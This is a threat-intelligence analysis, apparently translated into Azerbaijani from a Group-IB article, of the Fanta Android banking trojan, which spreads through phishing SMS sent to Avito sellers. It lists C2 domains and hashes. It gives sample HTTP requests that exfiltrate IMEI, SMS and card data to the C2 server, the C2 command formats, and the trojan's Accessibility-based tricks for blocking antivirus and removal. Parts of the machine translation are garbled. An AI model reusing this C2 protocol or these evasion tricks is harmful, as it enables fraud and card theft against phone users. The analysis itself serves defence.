Bir gün siz Avito-da nəsə satmaq istəyirsiniz və məhsulunuzun ətraflı təsvirini (məsələn, RAM modulu) yerləşdirdikdən sonra aşağıdakı mesajı alacaqsınız:
Linki açdığınız zaman sizə, xoşbəxt və uğurlu satıcıya, alışınızın edildiyini bildirən zərərsiz görünən bir səhifə görəcəksiniz:
"Davam et" düyməsini kliklədikdən sonra APK faylı Android cihazınıza simvolu və etibarlı adı ilə endiriləcək. Siz nədənsə AccessibilityService hüquqlarını tələb edən bir proqram quraşdırdınız, sonra bir neçə pəncərə göründü və tez yox oldu və ... Bu qədər.
Siz balansınızı yoxlamağa gedirsiniz, lakin nədənsə bank ərizəniz kart məlumatlarınızı yenidən tələb edir. Məlumatları daxil etdikdən sonra dəhşətli bir şey baş verir: sizin üçün hələ də anlaşılmaz olan nədənsə pul hesabınızdan yoxa çıxmağa başlayır. Problemi həll etməyə çalışırsınız, lakin telefonunuz müqavimət göstərir: o, öz-özünə arxa və ev düymələrini sıxır, sönmür və heç bir təhlükəsizlik tədbirini aktivləşdirməyə imkan vermir. Nəticədə pulsuz qalırsan, məhsulun alınmır, çaşıb qalırsan: nə olub?
Cavab sadədir: siz Flexnet ailəsi olan Fanta Android troyanının qurbanısınız. Necə oldu? İndi izah edək.
Müəlliflər: Andrey Polovinkin, Kiçik Zərərli Kod Analitiki, İvan Pisarev, Zərərli Kod Analitiki.
Bəzi statistika
Android troyanlarının Flexnet ailəsi haqqında ilk dəfə 2015-ci ildə məlumat verilmişdi. Kifayət qədər uzun bir fəaliyyət dövrü ərzində ailə bir neçə alt növə qədər genişləndi: Fanta, Limebot, Lipton və s. Trojan, eləcə də onunla əlaqəli infrastruktur hələ də dayanmır: yeni effektiv paylama sxemləri hazırlanır - bizim vəziyyətimizdə müəyyən bir istifadəçi-satıcıya yönəlmiş yüksək keyfiyyətli fişinq səhifələri və troyan tərtibatçıları moda meyllərini izləyirlər. virus yazısı - onlar yoluxmuş cihazlardan daha səmərəli pul oğurlamağa və qorunma mexanizmlərini keçməyə imkan verən yeni funksionallıq əlavə edirlər.
Bu məqalədə təsvir edilən kampaniya Rusiyadan olan istifadəçilərə yönəlib, Ukraynada az sayda, Qazaxıstan və Belarusda isə daha az sayda yoluxmuş qurğu qeydə alınıb.
Flexnet 4 ildən artıqdır ki, Android Trojan arenasında olmasına və bir çox tədqiqatçılar tərəfindən geniş şəkildə öyrənilməsinə baxmayaraq, hələ də yaxşı vəziyyətdədir. 2019-cu ilin yanvar ayından etibarən potensial zərərin miqdarı 35 milyon rubldan çoxdur - və bu, yalnız Rusiyadakı kampaniyalar üçündür. 2015-ci ildə bu Android Trojanının müxtəlif versiyaları yeraltı forumlarda satıldı, burada da ətraflı təsviri ilə Troyanın mənbə kodunu tapa bilərsiniz. Bu isə o deməkdir ki, dünyada dəymiş ziyanın statistikası daha da təsir edicidir. Belə qoca üçün pis rəqəm deyil, elə deyilmi?
Satışdan fırıldaqçılığa qədər
Avito reklamlarının yerləşdirilməsi üçün İnternet xidməti altında fişinq səhifəsinin əvvəllər təqdim edilmiş ekran görüntüsündən göründüyü kimi, o, müəyyən bir qurban üçün hazırlanmışdır. Göründüyü kimi, təcavüzkarlar Avito-nun təhlilçilərindən birini istifadə edərək, telefon nömrəsini və satıcının adını, eləcə də məhsulun təsvirini çıxarırlar. Səhifəni yerləşdirdikdən və APK faylını hazırladıqdan sonra qurbana onun adı və məhsulunun təsviri və məhsulun “satışından” alınan məbləği əks etdirən fişinq səhifəsinə keçid olan SMS mesajı göndərilir. Düyməni klikləməklə istifadəçi zərərli APK faylı - Fanta alır.
shcet491[.]ru domeninin tədqiqi göstərdi ki, o, Hostinger-in DNS serverlərinə həvalə olunub:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Domen zonası faylında 31.220.23[.]236, 31.220.23[.]243 və 31.220.23[.]235 IP ünvanlarına işarə edən qeydlər var. Bununla belə, domen əsas resurs qeydi (A-record) 178.132.1[.]240 IP ünvanı olan serverə işarə edir.
IP ünvanı 178.132.1[.]240 Hollandiyada yerləşir və hosterə məxsusdur. dünya axını. 31.220.23[.]235, 31.220.23[.]236 və 31.220.23[.]243 IP ünvanları Birləşmiş Krallıqda yerləşir və HOSTINGER paylaşılan hostinq serverinə aiddir. Qeydiyyatçı kimi istifadə olunur openprov-ru. Domenlər həmçinin 178.132.1[.]240 IP ünvanı ilə həll olunub:
- sdelka-ru[.]ru
- product-av[.]ru
- av-product[.]ru
- en-deal[.]az
- shcet382[.]ru
- sdelka221[.]az
- sdelka211[.]az
- vyplata437[.]ru
- viplata291[.]az
- tərcümə273[.]az
- tərcümə901[.]az
Qeyd etmək lazımdır ki, aşağıdakı formatda keçidlər demək olar ki, bütün domenlərdə mövcud idi:
http://(www.){0,1}<%domain%>/[0-9]{7}
Bu şablona həmçinin SMS mesajından keçid də daxildir. Tarixi məlumatlara görə, yuxarıda göstərilən nümunəyə uyğun olaraq bir neçə keçidin bir domenə uyğun olduğu aşkar edilmişdir ki, bu da Troyanı bir neçə qurbana yaymaq üçün bir domendən istifadəni göstərir.
Gəlin bir az irəliləyək: nəzarət serveri olaraq SMS-dən linkdən yüklənən Trojan ünvanı istifadə edir. onuseseddohap[.]klub. Bu domen 2019-03-12 tarixində qeydiyyata alınıb və 2019-04-29 tarixindən etibarən APK proqramları bu domenlə qarşılıqlı əlaqədə olub. VirusTotal-dan əldə edilən məlumatlara əsasən, ümumilikdə 109 proqram bu serverlə qarşılıqlı əlaqədə olub. Domenin özü bir IP ünvanına həll olunur 217.23.14[.]27, Hollandiyada yerləşir və hosterə məxsusdur dünya axını. Qeydiyyatçı kimi istifadə olunur ad. Domenlər də bu IP ünvanına həll edilib bad-racoon[.]club (2018 tarixindən başlayaraq) və bad-racoon[.]canlı (2018 tarixindən başlayaraq). domen ilə bad-racoon[.]club ilə 80-dən çox APK faylı ilə qarşılıqlı əlaqədə olub bad-racoon[.]canlı - 100-dən çox.
Ümumiyyətlə, hücumun gedişatı belədir:
Fantanın qapağın altında nə var?
Bir çox digər Android troyanları kimi, Fanta SMS mesajlarını oxuya və göndərə, USSD sorğuları göndərə və proqramların (o cümlədən bank əməliyyatları da daxil olmaqla) üzərində öz pəncərələrini göstərə bilir. Bununla belə, bu ailənin funksionallığı arsenalına gəldi: Fanta istifadə etməyə başladı Əlçatanlıq Xidməti müxtəlif məqsədlər üçün: digər proqramların bildirişlərinin məzmununu oxumaq, yoluxmuş cihazda troyanın aşkarlanmasının qarşısını almaq və icrasını dayandırmaq və s. Fanta 4.4-dən köhnə bütün Android versiyalarında işləyir. Bu yazıda aşağıdakı Fanta nümunəsinə daha yaxından nəzər salacağıq:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Başladıqdan dərhal sonra
Başladıqdan dərhal sonra Trojan öz ikonasını gizlədir. Tətbiq yalnız yoluxmuş cihazın adı siyahıda olmadıqda işləyə bilər:
- android_x86
- VirtualBox
- Nexus 5X(bullhead)
- Nexus 5(ülgüc)
Bu yoxlama əsas Trojan xidmətində həyata keçirilir - Əsas Xidmət. İlk işə salınma zamanı tətbiqin konfiqurasiya parametrləri standart dəyərlərlə işə salınır (konfiqurasiya məlumatlarının saxlanma formatı və onların mənası daha sonra müzakirə ediləcək), həmçinin yeni yoluxmuş cihazın idarəetmə serverində qeydiyyatı. Mesaj növü ilə serverə HTTP POST sorğusu göndəriləcək qeydiyyatdan_bot və yoluxmuş cihaz haqqında məlumat (Android versiyası, IMEI, telefon nömrəsi, operatorun adı və operatorun qeydiyyatda olduğu ölkənin kodu). Ünvan idarəetmə serveri kimi istifadə olunur hXXp://onuseseddohap[.]club/controller.php. Cavab olaraq, server sahələri olan bir mesaj göndərir bot_id, bot_pwd, server — bu dəyərlər proqram tərəfindən CnC serverinin parametrləri kimi saxlanılır. Parametr server sahə alınmadıqda isteğe bağlıdır: Fanta − qeydiyyat ünvanından istifadə edir hXXp://onuseseddohap[.]club/controller.php. CnC ünvanının dəyişdirilməsi funksiyası iki problemi həll etmək üçün istifadə edilə bilər: yükü bir neçə server arasında bərabər paylamaq (çox sayda yoluxmuş qurğu ilə, optimallaşdırılmamış veb serverdə yük yüksək ola bilər) və həmçinin alternativdən istifadə etmək. CnC serverlərindən birinin nasazlığı halında server.
Sorğunun göndərilməsi zamanı xəta baş verərsə, Trojan 20 saniyədən sonra qeydiyyat prosesini təkrarlayacaq.
Cihazı uğurla qeydiyyatdan keçirdikdən sonra Fanta istifadəçiyə aşağıdakı mesajı göstərəcək:
Vacib qeyd: çağırılan xidmət Sistem Təhlükəsizliyi - Trojan xidmətinin adı və düyməni basdıqdan sonra OK yoluxmuş cihazın Əlçatımlılıq parametrləri olan bir pəncərə açılacaq, burada istifadəçi zərərli xidmət üçün Əlçatanlıq hüquqlarını özü verməlidir:
İstifadəçi işə salındıqdan sonra Əlçatanlıq Xidməti, Fanta proqram pəncərələrinin məzmununa və onlarda yerinə yetirilən hərəkətlərə daxil olur:
Əlçatanlıq hüquqlarını əldə etdikdən dərhal sonra Trojan administrator hüquqlarını və bildirişləri oxumaq hüquqlarını tələb edir:
AccessibilityService-in köməyi ilə proqram düymələrin vuruşlarını simulyasiya edir və bununla da özünə bütün lazımi hüquqları verir.
Fanta konfiqurasiya məlumatlarını, eləcə də proses zamanı toplanmış yoluxmuş cihaz haqqında məlumatı saxlamaq üçün zəruri olan verilənlər bazalarının bir neçə nümunəsini (bunlar daha sonra təsvir olunacaq) yaradır. Toplanmış məlumatları göndərmək üçün Trojan verilənlər bazasından sahələri boşaltmaq və idarəetmə serverindən əmr almaq üçün nəzərdə tutulmuş təkrarlanan tapşırıq yaradır. CnC-yə zəng etmək üçün interval Android versiyasından asılı olaraq müəyyən edilir: 5.1 halda, interval 10 saniyə, əks halda 60 saniyə olacaq.
Komanda almaq üçün Fanta sorğu göndərir Tapşırıq alın nəzarət serverinə. Cavab olaraq, CnC aşağıdakı əmrlərdən birini göndərə bilər:
| Komanda | Təsvir |
|---|---|
| 0 | SMS mesajı göndərin |
| 1 | Telefon zəngi və ya USSD əmri edin |
| 2 | Parametri yeniləyir interval |
| 3 | Parametri yeniləyir kəsişmək |
| 6 | Parametri yeniləyir sms Manager |
| 9 | SMS mesajları toplamağa başlayın |
| 11 | Telefonu zavod parametrlərinə sıfırlayın |
| 12 | Dialoq qutularının yaradılmasının qeydiyyatını aktivləşdirmək/deaktiv etmək |
Fanta həmçinin 70 bank, sürətli ödəniş və elektron pul kisəsi proqramlarından bildirişlər toplayır və məlumat bazasında saxlayır.
Konfiqurasiya parametrlərinin saxlanması
Konfiqurasiya parametrlərini saxlamaq üçün Fanta Android platforması üçün standart yanaşmadan istifadə edir - Seçimlər-fayllar. Parametrlər adlı faylda saxlanacaq parametrləri. Saxlanılan parametrlərin təsviri aşağıdakı cədvəldə verilmişdir.
| ad | Cari dəyər | Mümkün dəyərlər | Təsvir |
|---|---|---|---|
| id | 0 | Tam | Bot ID |
| server | hXXp://onuseseddohap[.]club/ | URL | İdarəetmə serverinin ünvanı |
| pwd | - | Sim | Server parolu |
| interval | 20 | Tam | Vaxt intervalı. Aşağıdakı tapşırıqların nə qədər gecikdiriləcəyini göstərir:
|
| kəsişmək | hər | hamısı/telNumber | Sahə sətirə bərabərdirsə hər və ya tel nömrəsi, onda alınan SMS mesajı proqram tərəfindən tutulacaq və istifadəçiyə göstərilməyəcək |
| sms Manager | 0 | 0/1 | Tətbiqi standart SMS alıcısı kimi aktivləşdirin / söndürün |
| dialoq oxu | saxta | Doğru yalan | Hadisə qeydini aktivləşdirin/deaktiv edin Accessibility Event |
Fanta da fayldan istifadə edir sms Manager:
| ad | Cari dəyər | Mümkün dəyərlər | Təsvir |
|---|---|---|---|
| pckg | - | Sim | İstifadə edilən SMS menecerinin adı |
Verilənlər bazası ilə qarşılıqlı əlaqə
Troyan əməliyyat zamanı iki verilənlər bazasından istifadə edir. Adlandırılmış verilənlər bazası a telefondan toplanmış müxtəlif məlumatları saxlamaq üçün istifadə olunur. İkinci verilənlər bazası adlanır fanta.db və bank kartları haqqında məlumat toplamaq üçün nəzərdə tutulmuş fişinq pəncərələrinin yaradılmasına cavabdeh olan parametrləri saxlamaq üçün istifadə olunur.
Trojan verilənlər bazasından istifadə edir а toplanmış məlumatları saxlamaq və onların hərəkətlərini qeyd etmək. Məlumat cədvəldə saxlanılır logs. Cədvəl yaratmaq üçün aşağıdakı SQL sorğusundan istifadə olunur:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Verilənlər bazası aşağıdakı məlumatları ehtiva edir:
1. Yoluxmuş cihazı mesajla daxil etmək Telefon yandırıldı!
2. Proqramlardan bildirişlər. Mesaj aşağıdakı şablona uyğun olaraq hazırlanır:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Trojan tərəfindən yaradılmış fişinq formalarından bank kartı məlumatları. Parametr VIEW_NAME siyahıdan biri ola bilər:
- AliExpress
- Avito
- Google Play
- Müxtəlif <%Proqram Adı%>
Mesaj aşağıdakı formatda qeyd olunur:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Formatda gələn / gedən SMS mesajları:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Dialoq qutusunu formatda yaradan paket haqqında məlumat:
(<%Package name%>)<%Package information%>
Cədvəl nümunəsi logs:
Fanta-nın funksiyalarından biri bank kartları haqqında məlumatların toplanmasıdır. Məlumat bank proqramlarını açarkən fişinq pəncərələri yaratmaqla toplanır. Trojan yalnız bir dəfə fişinq pəncərəsi yaradır. Pəncərənin istifadəçiyə göstərildiyi məlumat cədvəldə saxlanılır parametrləri verilənlər bazasında fanta.db. Verilənlər bazasını yaratmaq üçün aşağıdakı SQL sorğusundan istifadə olunur:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Bütün cədvəl sahələri parametrləri defolt olaraq 1-ə (fishing pəncərəsi yaradın) işə salınıb. İstifadəçi öz məlumatlarını daxil etdikdən sonra dəyər 0-a təyin olunacaq. Cədvəl sahələrinə misal parametrləri:
- daxil ola bilərsiniz — sahə bank ərizəsini açarkən formanın göstərilməsinə cavabdehdir
- birinci_bank - istifadə olunmur
- can_avito - sahə Avito tətbiqini açarkən formanın göstərilməsinə cavabdehdir
- can_ali - sahə Aliexpress tətbiqini açarkən formanın göstərilməsinə cavabdehdir
- başqa_başqa - sahə siyahıdan hər hansı bir tətbiqi açarkən formanın göstərilməsinə cavabdehdir: Yula, Pandao, Drome Auto, Pul kisəsi. Endirim və bonus kartları, Aviasales, Booking, Trivago
- can_card - sahə açarkən formanın göstərilməsinə cavabdehdir Google Play
Nəzarət serveri ilə qarşılıqlı əlaqə
İdarəetmə serveri ilə şəbəkə qarşılıqlı əlaqəsi HTTP protokolu vasitəsilə baş verir. Fanta şəbəkə ilə işləmək üçün məşhur Retrofit kitabxanasından istifadə edir. Müraciətlər ünvanına göndərilir hXXp://onuseseddohap[.]club/controller.php. Serverdə qeydiyyatdan keçərkən server ünvanı dəyişdirilə bilər. Kuki serverdən qaytarıla bilər. Fanta serverə aşağıdakı sorğuları edir:
- Nəzarət serverində botun qeydiyyatı ilk başlanğıcda bir dəfə baş verir. Yoluxmuş cihaz haqqında aşağıdakı məlumatlar serverə göndərilir:
· Cookie - serverdən alınan kukilər (defolt dəyər boş sətirdir)
· rejimində - sətir sabiti qeydiyyatdan_bot
· prefiks - tam ədəd sabiti 2
· version_sdk - aşağıdakı şablona uyğun formalaşır: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI — yoluxmuş cihazın IMEI
· ölkə — operatorun qeydiyyatda olduğu ölkənin ISO formatında kodu
· nömrə - telefon nömrəsi
· operator - operator adıServerə göndərilən sorğu nümunəsi:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Sorğuya cavab olaraq, server aşağıdakı parametrləri ehtiva edən JSON obyektini qaytarmalıdır:
bot_id — yoluxmuş cihazın identifikatoru. Əgər bot_id 0-a bərabərdirsə, Fanta sorğunu yenidən icra edəcək.
bot_pwd - server üçün parol.
server — nəzarət serverinin ünvanı. Könüllü parametr. Parametr göstərilməyibsə, proqramda saxlanmış ünvan istifadə olunacaq.JSON obyekt nümunəsi:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Serverdən əmr almaq üçün sorğu. Aşağıdakı məlumatlar serverə göndərilir:
· Cookie — serverdən alınan kukilər
· teklif — sorğu göndərilərkən alınan yoluxmuş cihazın id-si qeydiyyatdan_bot
· pwd - server üçün parol
· divice_admin - sahə administrator hüquqlarının əldə edilib-edilmədiyini müəyyən edir. Administrator hüquqları əldə edilibsə, sahə bərabərdir 1əks halda 0
· Münasiblik - Əlçatanlıq Xidmətinin statusu. Xidmət işə salınıbsa, dəyər belədir 1əks halda 0
· SMSManager - troyanın SMS qəbulu üçün standart proqram kimi aktiv olub olmadığını göstərir
· ekran — ekranın hansı vəziyyətdə olduğunu göstərir. dəyəri təyin olunacaq 1ekran açıqdırsa, əks halda 0;Serverə göndərilən sorğu nümunəsi:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Komandadan asılı olaraq, server müxtəlif parametrləri olan JSON obyektini qaytara bilər:
· Komanda SMS mesajı göndərin: Parametrlər telefon nömrəsini, SMS mesajının mətnini və göndəriləcək mesajın identifikatorunu ehtiva edir. İdentifikator növü ilə serverə mesaj göndərilərkən istifadə olunur setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Komanda Telefon zəngi və ya USSD əmri edin: Telefon nömrəsi və ya əmr cavabın mətnində gəlir.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Komanda Interval parametrini dəyişdirin.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Komanda Intercept parametrini dəyişdirin.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Komanda SmsManager sahəsini dəyişdirin.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Komanda Yoluxmuş cihazdan SMS mesajları toplayın.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Komanda Telefonu zavod parametrlərinə sıfırlayın:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Komanda ReadDialog parametrini dəyişdirin.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Növü ilə mesaj göndərilir setSmsStatus. Bu tələb əmr yerinə yetirildikdən sonra edilir SMS mesajı göndərin. Müraciət belə görünür:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Verilənlər bazasının məzmununun təqdim edilməsi. Hər sorğu üçün bir sətir ötürülür. Aşağıdakı məlumatlar serverə göndərilir:
· Cookie — serverdən alınan kukilər
· rejimində - sətir sabiti SetSaveInboxSms
· teklif — sorğu göndərilərkən alınan yoluxmuş cihazın id-si qeydiyyatdan_bot
· mətn — cari verilənlər bazası qeydindəki mətn (sahə d masadan logs verilənlər bazasında а)
· nömrə — cari verilənlər bazası qeydinin adı (sahə p masadan logs verilənlər bazasında а)
· sms_rejimi - tam dəyər (sahə m masadan logs verilənlər bazasında а)Müraciət belə görünür:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Serverə uğurla təqdim edildikdən sonra sıra cədvəldən silinəcək. Server tərəfindən qaytarılan JSON obyektinin nümunəsi:
{ "response":[], "status":"ok" }
AccessibilityService ilə qarşılıqlı əlaqə
AccessibilityService əlilliyi olan insanların Android cihazlarından istifadəsini asanlaşdırmaq üçün tətbiq edilib. Əksər hallarda proqramla qarşılıqlı əlaqə yaratmaq üçün fiziki qarşılıqlı əlaqə tələb olunur. AccessibilityService onları proqramlı şəkildə etməyə imkan verir. Fanta bu xidmətdən bank proqramlarında saxta pəncərələr yaratmaq və sistem parametrlərinin və bəzi proqramların açılmasının qarşısını almaq üçün istifadə edir.
AccessibilityService funksionallığından istifadə edərək, troyan yoluxmuş cihazın ekranındakı elementlərə edilən dəyişiklikləri izləyir. Daha əvvəl təsvir edildiyi kimi, Fanta parametrləri dialoq qutuları ilə əməliyyatların qeydinə cavabdeh olan bir parametr ehtiva edir - dialoq oxu. Bu seçim qoyularsa, hadisəni törədən paketin adı və təsviri haqqında məlumat verilənlər bazasına əlavə olunacaq. Trojan hadisələr baş verdikdə aşağıdakı hərəkətləri yerinə yetirir:
- Aşağıdakı hallarda geri və ev düymələrinin vuruşlarını simulyasiya edir:
· istifadəçi cihazını yenidən başlatmaq istəyirsə
· istifadəçi “Avito” proqramını silmək və ya giriş hüquqlarını dəyişdirmək istəyirsə
· səhifədə “Avito” tətbiqi haqqında qeyd varsa
· "Google Play Protect" proqramını açdığınız zaman
· AccessibilityService parametrləri ilə səhifələri açarkən
· Sistem Təhlükəsizliyi informasiya qutusu görünəndə
· "Digər tətbiqin üzərindən çəkin" parametrləri ilə səhifəni açarkən
· səhifəni açdığınız zaman “Proqramlar”, “Yedəkləmə və Sıfırlama”, “Məlumatların Sıfırlanması”, “Parametrləri Sıfırla”, “Tərtibatçı Paneli”, “Spec. imkanlar”, “Əlçatanlıq”, “Xüsusi hüquqlar”
· hadisə müəyyən proqramlar tərəfindən yaradılıbsa.Tətbiq siyahısı
- Android
- Master Lite
- Təmizləmək master
- X86 CPU üçün Təmiz Master
- Meizu Tətbiqi İcazə İdarəetmə
- MIUI Təhlükəsizliyi
- Təmiz Usta - Antivirus, Keş və Lazımsız Təmizləyici
- Valideyn nəzarəti və GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Təmiz, Antivirus, Təmiz (MAX Təhlükəsizlik)
- Mobil AntiVirus Təhlükəsizliyi PRO
- Avast antivirus və pulsuz qorunma 2019
- Mobil Təhlükəsizlik MegaFon
- Xperia üçün AVG qorunması
- Mobil Təhlükəsizlik
- Malwarebytes antivirus və qorunması
- Android 2019 üçün antivirus
- Təhlükəsizlik Master - Antivirus, VPN, AppLock, Booster
- Planşet Huawei Sistem Meneceri üçün AVG antivirus
- Samsung əlçatanlığı
- Samsung Smart Manager
- Təhlükəsizlik ustası
- Sürət artırıcısı
- dr.web
- Dr.Web Təhlükəsizlik Məkanı
- Dr.Web Mobil İdarəetmə Mərkəzi
- Dr.Web Təhlükəsizlik Space Life
- Dr.Web Mobil İdarəetmə Mərkəzi
- Antivirus və Mobil Təhlükəsizlik
- Kaspersky Internet Security: Antivirus və Qoruma
- Kaspersky Battery Life: Saver & Booster
- Kaspersky Endpoint Security - qorunma və idarəetmə
- AVG Antivirus pulsuz 2019 - Android üçün qorunma
- Antivirus Android
- Norton Mobile Security və Antivirus
- Antivirus, firewall, VPN, mobil təhlükəsizlik
- Mobil Təhlükəsizlik: Antivirus, VPN, Oğurluğa qarşı
- Android üçün antivirus
- Qısa nömrəyə SMS göndərərkən icazə tələb olunarsa, Fanta onay qutusuna klikləməyi simulyasiya edir. Seçimi yadda saxla və düymə göndərmək.
- Trojandan administrator hüquqlarını götürməyə çalışdığınız zaman o, telefon ekranını bloklayır.
- Yeni administratorların əlavə edilməsinin qarşısını alır.
- Antivirus proqramı varsa dr.web təhlükə aşkar etdikdə, Fanta düyməni basmağı təqlid edir laqeyd et.
- Trojan, hadisə proqram tərəfindən yaradılıbsa, geri və ev düyməsini basmağı simulyasiya edir Samsung Cihaza Qulluq.
- Fanta 30-a yaxın müxtəlif internet xidmətlərinin siyahısından proqram işə salınarsa, bank kartları haqqında məlumatların daxil edilməsi üçün formalar olan fişinq pəncərələri yaradır. Onların arasında: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto və s.
Fişinq formaları
Fanta yoluxmuş cihazda hansı proqramların işlədiyini təhlil edir. Əgər maraq tətbiqi açılıbsa, Trojan bütün digərlərinin üstündə fişinq pəncərəsini göstərir ki, bu da bank kartı haqqında məlumat daxil etmək üçün formadır. İstifadəçi aşağıdakı məlumatları daxil etməlidir:
- Kartı nömrəsi
- Kartın istifadə müddəti
- CVV
- Kart sahibinin adı (bütün banklar üçün deyil)
Çalışan proqramdan asılı olaraq müxtəlif fişinq pəncərələri göstəriləcək. Aşağıda onlardan bəzilərinin nümunələri verilmişdir:
AliExpress:
Avito:
kimi bəzi digər proqramlar üçün Google Play Market, Aviasales, Pandao, Booking, Trivago:
Həqiqətən necə idi
Xoşbəxtlikdən, məqalənin əvvəlində təsvir olunan SMS mesajını alan şəxsin kibertəhlükəsizlik üzrə mütəxəssis olduğu üzə çıxıb. Buna görə də, real, qeyri-rejissor versiyası əvvəllər deyiləndən fərqlənir: şəxs maraqlı bir SMS aldı, sonra onu Group-IB Threat Hunting Intelligence komandasına verdi. Hücumun nəticəsi bu məqalədir. Xoşbəxt son, elə deyilmi? Bununla belə, bütün hekayələr o qədər də yaxşı bitmir və sizinkilər pul itkisi ilə rejissorun kəsilməsi kimi görünməməsi üçün əksər hallarda aşağıdakı uzun təsvir edilmiş qaydalara riayət etmək kifayətdir:
- Android mobil cihazınız üçün Google Play-dən başqa heç bir mənbədən proqramlar quraşdırmayın
- tətbiqi quraşdırarkən, tətbiqin tələb etdiyi hüquqlara xüsusi diqqət yetirin
- yüklənmiş faylların uzantılarına diqqət yetirin
- Android OS yeniləmələrini müntəzəm olaraq quraşdırın
- şübhəli mənbələrə baş çəkməyin və oradan faylları yükləməyin
- SMS mesajlarında alınan linklərə klikləməyin.
Mənbə: www.habr.com